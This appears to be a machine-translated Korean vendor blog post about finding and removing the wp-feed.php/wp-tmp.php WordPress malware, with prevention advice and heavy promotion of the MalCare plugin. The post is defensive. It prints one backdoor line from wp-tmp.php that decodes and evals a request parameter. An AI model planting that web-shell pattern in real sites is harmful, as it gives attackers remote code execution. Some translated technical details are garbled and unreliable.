멀웨어 스캐너가 "사이트가 해킹당했습니다"라고 경고하지만 문제는 없어 보입니까?
방문자가 WordPress 웹사이트의 스팸 광고에 대해 불평하고 있지만 광고가 표시되지 않습니까?
사이트가 해킹되었을 가능성이 높습니다.
해커는 해커를 위장하는 영리한 방법을 찾습니다. 사이트 소유자로부터 탐지되지 않고 오랫동안 웹 사이트를 계속 악용할 수 있습니다.
wp-feed.php는 가장 교묘하게 위장한 해킹 중 하나입니다.
사이트 소유자에게 숨겨져 불법 제품, 마약 및 성인 콘텐츠에 대한 광고를 방문자에게 표시합니다.
발견했다고 해도 감염이 퍼진 모든 장소를 찾는 것은 어려울 뿐만 아니라 때로는 불가능합니다. 감염 제거는 복잡하고 어렵습니다. 제거에 성공하면 10건 중 8건에서 감염이 다시 나타납니다.
결론:WordPress 웹사이트에서 wp-feed.php 감염을 제거하는 것은 어렵습니다.
운 좋게도 우리는 이 맬웨어를 전에도 수없이 처리했습니다. 지난 10년 동안 우리는 수백 수천 개의 WordPress 웹사이트에서 wp-feed를 성공적으로 제거했을 뿐만 아니라 재감염도 방지했습니다.
괜찮아요. 당신은 좋은 손입니다.
이 문서에서 배울 내용:
- wp-feed.php 악성코드가 작동하는 방식 및 웹사이트에 미치는 영향
- 사이트에서 삭제하는 방법
- 향후 재감염을 방지하는 방법
틀;DR : wp-feed.php 감염을 제거하려면 다음을 설치하기만 하면 됩니다. WordPress 악성 코드 제거 을 클릭하고 자동 청소 기능을 실행합니다. 플러그인은 또한 재감염을 가능하게 하는 웹사이트 백도어를 제거하고 방화벽 및 로그인 보호를 통해 사이트에 액세스하는 악성 트래픽을 차단하여 재감염을 방지합니다.
wp-feed.php 및 wp-tmp.php란 무엇입니까? (원인, 증상 및 재감염)
간단히 말해: WP-Feed는 웹 사이트에 악성 광고를 표시하는 악성 코드 유형입니다. 목표는 방문자가 광고를 클릭하여 악성 웹사이트로 리디렉션하도록 하는 것입니다.
궁금하실텐데요 –
> 내 웹사이트가 어떻게 감염되었습니까?
감염은 일반적으로 nulled 플러그인 또는 테마 사용으로 인해 발생합니다. .
Nulled 소프트웨어는 프리미엄 기능을 무료로 제공하기 때문에 사용하고 싶어집니다. 많은 사람들은 nulled 소프트웨어가 자선 행위로 배포된다고 믿습니다.
그것은 일반적으로 경우와 거리가 멀다. Nulled 소프트웨어가 배포되어 해커가 손쉽게 사이트에 액세스할 수 있습니다.
Nulled 플러그인 또는 테마는 맬웨어로 가득 차 있습니다. 웹 사이트에 nulled 테마 또는 플러그인을 설치하면 기본적으로 해커가 사이트에 액세스할 수 있는 문이 열립니다.
무효화된 소프트웨어 외에도 오래된 플러그인 및 테마 취약할 수도 있습니다. 해커는 이러한 취약점을 악용하여 사이트에 침입합니다.
또한 약한 사용자 이름과 비밀번호 를 악용합니다. "admin" 및 "p@sword"와 같이. 약한 자격 증명은 추측하기 쉽습니다.
해커가 사용자 이름과 로그인을 추측하고 웹사이트에 wp-feed.php 악성코드를 직접 삽입할 수 있습니다.
> 해커가 wp-feed.php로 사이트를 감염시키는 이유는 무엇입니까?
목표는 방문자를 훔쳐 가짜 서비스나 제품을 구매하도록 속여 해커가 수익을 창출할 수 있도록 하는 것입니다.
정말 놀라운 것은 사이트 소유자가 힌트를 얻지 않고 종종 이를 달성할 수 있다는 것입니다.
이것은 우리에게 질문을 가져다줍니다 –
> 이 감염의 증상을 알아차리기 어려운 이유는 무엇입니까?
해커가 웹사이트에 액세스하면 wp-includes 폴더에 두 개의 파일(wp-feed.php 및 wp-tmp.php)을 삽입합니다.
wp-includes 폴더는 WordPress 코어의 일부입니다. 웹사이트의 테마가 있는 곳입니다.
WP 피드 파일은 다른 WordPress 파일, 특히 활성 테마의 일부인 function.php를 감염시키기 시작합니다.
function.php 내에서 해커는 WordPress 웹사이트에 악성 팝업 광고를 표시할 수 있습니다.
하지만 정말 끔찍한 부분은 광고가 신규 방문자에게만 표시된다는 것입니다. , 반복 방문자가 아닙니다. 멀웨어는 사이트 방문자를 기록하여 새로운 방문자에게만 광고가 표시되도록 합니다. 이것은 탐지를 방지하는 독창적인 방법입니다.
따라서 귀하의 사이트를 자주 방문하는 귀하는 해킹의 징후를 전혀 느끼지 못합니다.
wp-feed.php 악성코드를 치료하는 방법
감염을 제거하는 두 가지 방법이 있습니다. 그것들은 –
1. 플러그인 사용(쉬움)
2. 수동으로 수행(어려움)
각 방법에 대해 알아보겠습니다.
1. 플러그인으로 WP-Feed.php 악성코드 제거(쉬운 방법)
웹사이트에 이미 보안 플러그인이 설치되어 있는 사람도 있을 수 있습니다. 악성 파일에 대해 경고한 것은 아마도 이 플러그인이었을 것입니다. wp-includes/wp-feed.php 및 wp-includes/wp-tmp.php .
대부분의 보안 플러그인은 맬웨어 제거 서비스를 제공하지만 MalCare Security만큼 빠르고 효과적으로 수행할 수 있는 플러그인은 거의 없습니다.
- MalCare가 60초 이내에 사이트를 정리합니다. . 티켓을 올릴 필요가 없습니다. 대기열에서 기다릴 필요가 없습니다. 사이트의 자격 증명을 타사 플러그인에 넘겨줄 필요가 없습니다.
- 그뿐만 아니라 플러그인은 숨겨진 맬웨어를 찾아 구석구석까지 파고들고 있습니다. 모든 단일 악성 스크립트를 찾습니다. 사이트에 표시됩니다.
- 전통적이지 않은 방법을 사용하여 새롭고 잘 숨겨진 악성코드를 감지합니다. . 코드의 동작을 철저히 분석하여 악의적인 의도를 식별합니다. 이는 또한 좋은 코드를 나쁜 코드로 표시하지 않음을 확인하는 데 도움이 됩니다. .
- 이 모든 작업을 몇 분 안에 수행합니다. .
MalCare로 wp-feed.php 감염을 치료합시다.
1단계: WordPress 웹사이트에 MalCare Security를 설치하고 활성화하십시오.
2단계: 대시보드 메뉴에서 MalCare를 선택합니다. 이메일 주소 입력 지금 사이트 보안을 클릭합니다. .
3단계: 다음 페이지에서 비밀번호를 입력하고 그런 다음 URL을 입력하려면 .
MalCare는 즉시 웹사이트 검사를 시작합니다. 목적은 웹사이트에 존재하는 악성 코드의 모든 단일 인스턴스를 찾는 것입니다.
즉, wp-feed.php 및 wp-tmp.php 파일뿐만 아니라 function.php 파일에 숨어 있는 인스턴스를 포함하여 WordPress 파일을 감염시키는 모든 악성 코드를 감지합니다.
플러그인은 재감염을 방지하기 위해 사이트에 있는 모든 단일 백도어도 찾을 수 있으므로 안심할 수 있습니다.
악성 스크립트를 찾으면 플러그인에서 이에 대해 경고합니다.
다음으로 사이트를 정리해야 합니다.
참고 MalCare의 맬웨어 제거 은 프리미엄 기능입니다. 입니다 즉석만 멀웨어 제거 플러그인이 있습니다. 1년에 99달러로 원하는 만큼 단일 사이트를 청소할 수 있으며 가능한 한 최고의 보호를 받을 수 있습니다. 에 대해 자세히 알아보기 MalCare 가격 <엠>.
4단계: 웹사이트에서 wp-feed.php의 모든 흔적을 제거하려면 자동 청소 를 클릭하기만 하면 됩니다. 버튼.
MalCare는 즉시 사이트 청소를 시작합니다.
그게 다야, 여러분. 이것이 플러그인으로 웹사이트를 정리하는 방법입니다.
2. 수동으로 WP-Feed.php 악성코드 제거(어려운 방법)
수동으로 감염을 제거하는 것은 상당히 어렵습니다. 이러한 유형의 감염에는 움직이는 조각이 많기 때문입니다.
- 해커는 wp-feed.php 및 wp-tmp.php의 두 가지 악성 파일을 업로드합니다. 시작하려면 제거해야 합니다. 이것은 아마도 유일한 쉬운 부분일 것입니다.
- function.php 파일을 포함한 다른 WordPress 파일로 감염이 확산됩니다. 이것은 감염이 어디에서 퍼졌는지를 말해주기 때문에 어렵습니다.
- 모든 악성 코드를 찾는 데 몇 시간이 걸립니다.
- 악성 코드는 위장이 잘 되어 있고 정상적인 코드 조각처럼 보이기 때문에 식별이 어렵습니다.
- "eval(base64_decode)"과 같은 일부 알려진 악성 코드는 합법적인 플러그인의 일부일 수 있습니다. 악의적인 방식으로 사용되지 않습니다. 따라서 코드를 삭제하면 플러그인에 영향을 미치고 사이트가 손상될 수도 있습니다.
- 재감염으로 이어질 수 있는 코드 조각을 놓칠 가능성이 상당히 높습니다.
따라서 수동 제거는 전혀 효과적이지 않습니다.
그러나 여전히 수행하려면 웹 사이트를 완전히 백업하십시오. 실수로 무언가를 삭제하고 사이트가 손상되면 빠르게 정상으로 복원할 수 있습니다.
다음은 선택할 수 있는 최고의 백업 서비스 목록입니다.
그리고 여기에 악성코드를 수동으로 제거하는 데 도움이 되는 기사가 있습니다. WordPress 해킹. "해킹된 WordPress 웹사이트를 수동으로 정리하는 방법"으로 이동하세요. 섹션.
귀하의 웹사이트는 이제 감염되지 않았지만 안전과는 거리가 멉니다. 해커는 여전히 사이트를 표적으로 삼고 감염을 시도할 수 있습니다. 향후 감염으로부터 사이트를 보호해야 합니다. 그러나 우리가 그것에 들어가기 전에 wp-feed.php &wp-tmp.php 감염의 영향을 살펴 보겠습니다.
wp-temp.php 맬웨어 감염의 영향
말할 필요도 없이 wp-feed.php 및 wp-tmp.php 악성코드의 존재는 웹사이트에 치명적인 영향을 미칠 수 있습니다.
wp-temp.php에 감염된 웹사이트는 종종 다음과 같은 결과를 겪습니다:
- 이탈률 급증을 확인할 수 있습니다. 및 시간 방문자 감소 귀하의 웹사이트에 지출합니다.
- 팝업 광고는 웹사이트를 무겁고 매우 느리게 만듭니다. .
- 느린 웹사이트를 좋아하는 사람은 아무도 없으므로 방문자는 뒤로 버튼을 누를 가능성이 높습니다. 브라우저에 페이지가 로드되기 전에 이것은 도미노 효과가 있을 것입니다.
- 검색 엔진은 사람들이 귀하의 사이트를 얼마나 빨리 떠나는지 알 수 있습니다. 그들은 사용자가 찾고 있는 것을 제공하지 않는다는 결론을 내릴 것입니다. 검색 엔진 순위가 하락합니다 .
- 이것은 모든 노력, 시간 및 돈을 의미합니다. SERP에서 더 높은 순위를 얻기 위해 소비했을 수도 있습니다. 낭비 .
- 해킹된 웹사이트는 블랙리스트입니다. Google 및 일시중지 호스팅 제공 업체에 의해. 또한 해킹된 사이트에서 Google 광고를 실행하는 경우 애드워즈 계정이 정지됩니다. 이 모든 것이 교통 체증으로 이어질 것입니다.
- 게다가 해킹된 웹사이트는 청소해야 합니다. 이는 값비싼 일이 될 수 있습니다. 올바른 도구를 사용하지 않는 경우.
좋은 소식은 사이트가 해킹되었다는 사실을 알고 있다는 것입니다. 따라서 청소하고 충격을 막을 수 있습니다.
미래에 wp-feed.php 악성코드로부터 사이트를 보호하는 방법은 무엇입니까?
많은 독자가 사이트에서 wp-feed.php 멀웨어를 제거하려고 시도했지만 멀웨어가 계속 반환된다는 것을 발견했습니다.
이것은 귀하의 사이트에 백도어가 설치되어 있기 때문에 발생합니다. 대부분의 백도어는 매우 잘 위장되어 있어 아마추어 개발자가 합법적인 코드로 전달할 수 있습니다.
이전 섹션에서 우리는 해커가 웹사이트 코드에 wp-feed.php &wp-tmp.php라는 두 개의 파일을 삽입한다고 설명했습니다. wp-tmp.php 파일은 백도어 역할을 합니다. 파일을 열면 다음과 같은 스크립트를 찾을 수 있습니다 –
$p = $REQUEST$#91;”m”]; eval(base64_decode ($p));
좋은 소식은 다음 조치를 취하여 향후 해킹 시도로부터 사이트를 보호할 수 있다는 것입니다.
1. Nulled 소프트웨어 삭제 및 사용 중지
웹사이트에서 nulled 플러그인이나 테마를 사용하는 경우 즉시 삭제하세요. .
해커는 처음에 nulled 소프트웨어를 사용하여 사이트에 대한 액세스 권한을 얻었습니다. 사이트를 아무리 잘 정리하더라도 nulled 소프트웨어를 제거하지 않으면 해커가 사이트에 침입하여 멀웨어를 삽입할 것입니다.
사용자에게 플러그인과 테마를 설치할 수 있는 권한을 부여했다면 사용자가 null 소프트웨어를 사용하지 않도록 하십시오.
사실 플러그인과 테마의 설치를 모두 방지하는 연습을 하는 것이 좋습니다. MalCare의 도움으로.
MalCare 대시보드에 로그인하고 웹사이트를 선택한 다음 강화 적용을 클릭하기만 하면 됩니다. , 플러그인/테마 차단 활성화 설치.
2. 사이트 보안 강화
파일 권한을 변경하여 해커가 wp-feed.php와 같은 악성 파일을 WordPress 폴더에 이식하는 것을 방지할 수 있습니다. .
파일 권한은 누가 어떤 파일에 액세스할 수 있는지를 결정하는 일련의 규칙입니다. 사용자가 wp-includes 폴더를 수정하지 못하도록 차단할 수 있습니다. 파일 권한을 더 깊이 이해하려면 WordPress 파일 권한 가이드를 확인하세요.
파일 편집기를 비활성화하여 해커가 테마를 수정하지 못하도록 차단할 수도 있습니다. . 이렇게 하면 웹사이트에 팝업 광고가 삽입되는 것을 방지할 수 있습니다. 수동으로 수행할 수 있지만 위험하고 권장하지 않습니다.
사이트에 MalCare가 이미 설치되어 있는 경우 버튼을 클릭하여 파일 편집기를 비활성화하기만 하면 됩니다.
WordPress 강화에 대해 자세히 알아보십시오.
3. 웹사이트를 최신 상태로 유지
다른 소프트웨어와 마찬가지로 WordPress 플러그인 및 테마는 취약점을 개발합니다. 개발자는 이 취약점에 대해 알게 되면 빠르게 패치를 만들고 업데이트 형태로 릴리스합니다.
업데이트 구현이 지연되면 사이트가 위험에 처하게 됩니다.
해커는 취약점 악용에 능숙합니다. . 사실, 그들은 취약점이 있는 웹사이트를 항상 경계하고 있어 취약점이 있는 웹사이트를 사용하여 사이트에 액세스하고 사이트를 맬웨어로 감염시킬 수 있습니다.
따라서 업데이트를 지연하지 마십시오.
여기에서 보안 업데이트에 대해 자세히 알아볼 수 있습니다 – WordPress 보안 업데이트.
다음은 사이트를 최신 상태로 유지하는 데 도움이 되는 가이드입니다 – WordPress 업데이트 방법.
4. 강력한 자격 증명 사용 시행
웹사이트에 액세스하는 가장 쉬운 방법은 로그인 페이지를 이용하는 것입니다.
해커는 사용자 자격 증명을 성공적으로 추측하기만 하면 됩니다. 사실, 그들은 몇 분 안에 수백 개의 사용자 이름과 비밀번호 조합을 시도할 수 있는 봇을 설계합니다. 귀하 또는 귀하의 팀원이 "admin" 및 "password123"과 같은 추측하기 쉬운 자격 증명을 사용하는 경우 봇이 사이트를 침입하는 데 2초가 걸립니다. 이를 무차별 대입 공격이라고 합니다.
웹사이트의 모든 사용자가 고유한 사용자 이름과 강력한 암호를 사용하도록 하는 것이 중요합니다.
이 이상으로 로그인 페이지를 보호하기 위해 몇 가지 조치를 구현할 수도 있습니다. 취할 수 있는 WordPress 로그인 보안 조치 목록을 작성했습니다.
5. 방화벽 사용
해커가 귀하의 웹 사이트에 처음 방문하는 것조차 막을 수 있다면 좋지 않을까요?
방화벽은 필요한 도구일 뿐입니다.
트래픽을 조사합니다. 귀하의 사이트에 액세스하려는 트래픽이 악성 IP 주소에서 시작된 것으로 감지되면 방화벽은 즉시 트래픽을 차단합니다.
이러한 방식으로 해커와 봇을 걸러냅니다.
다음은 사이트에서 활성화할 수 있는 최고의 WordPress 방화벽 목록입니다.
그러나 MalCare를 사용하는 경우 사이트에 이미 방화벽이 활성화되어 있습니다.
다음은?
사이트를 정리하는 방법과 다시는 해킹되지 않도록 하는 방법을 알려 드렸습니다.
수많은 재난으로부터 웹사이트를 구할 수 있다고 생각하는 조언 중 하나는 웹사이트를 정기적으로 백업하는 것입니다.
웹사이트에서 갑자기 오류가 발생하거나 중단된 경우 백업을 통해 사이트를 일시적으로 신속하게 수정할 수 있습니다.
MalCare Security에 가입하면 추가 비용으로 백업 애드온을 사용할 수도 있습니다. 자세한 내용은 당사에 문의하십시오.
주다 MalCare 보안 플러그인 스핀!